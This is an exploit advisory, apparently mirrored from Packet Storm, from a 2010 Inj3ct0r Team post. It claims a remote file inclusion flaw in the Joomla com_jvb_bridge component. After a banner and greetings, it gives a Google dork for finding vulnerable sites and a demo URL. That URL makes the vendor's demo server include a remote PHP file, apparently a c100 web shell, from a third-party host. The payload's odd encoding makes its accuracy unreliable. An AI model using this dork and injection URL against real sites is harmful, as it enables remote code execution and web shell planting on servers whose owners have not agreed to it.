The Joomla JVB Bridge component suffers from a remote file inclusion vulnerability.
64424a4591702904254d5666ebf04d5a22973487b902b3ff054a03affad9ae1a =============================================
Joomla com_jvb_bridge RFI Vulnerability
=============================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Joomla com_jvb_bridge RFI Vulnerability
Date : june, 20 2010
Critical Level : HIGH
Vendor Url : http://www.joomplace.com/bridges/vbulletin-module---latest-posts.html
Google Dork:inurl:com_jvb_bridge
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description:
Using this joomla module you will have the lastest posts from vBulletin forum shown on your web site.
It is possible to switch the module to either extended view (that will show threads from different forums in tabs) or simple mode (with no division to tabs). And it is possible to show latest threads from the whole forum without adding specific subforums to the component's config.
###############################################################################################################
Xploit: RFI Vulnerability
com_jvb_bridge suffers from a RFI vulnerability :)
DEMO URL : http://demo.joomplace.com/index.php?option=com_jvb_bridge&Itemid=%272#http://nafeesnursery.com/images/c100.php
###############################################################################################################
# 0day no more
# Sid3^effects
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed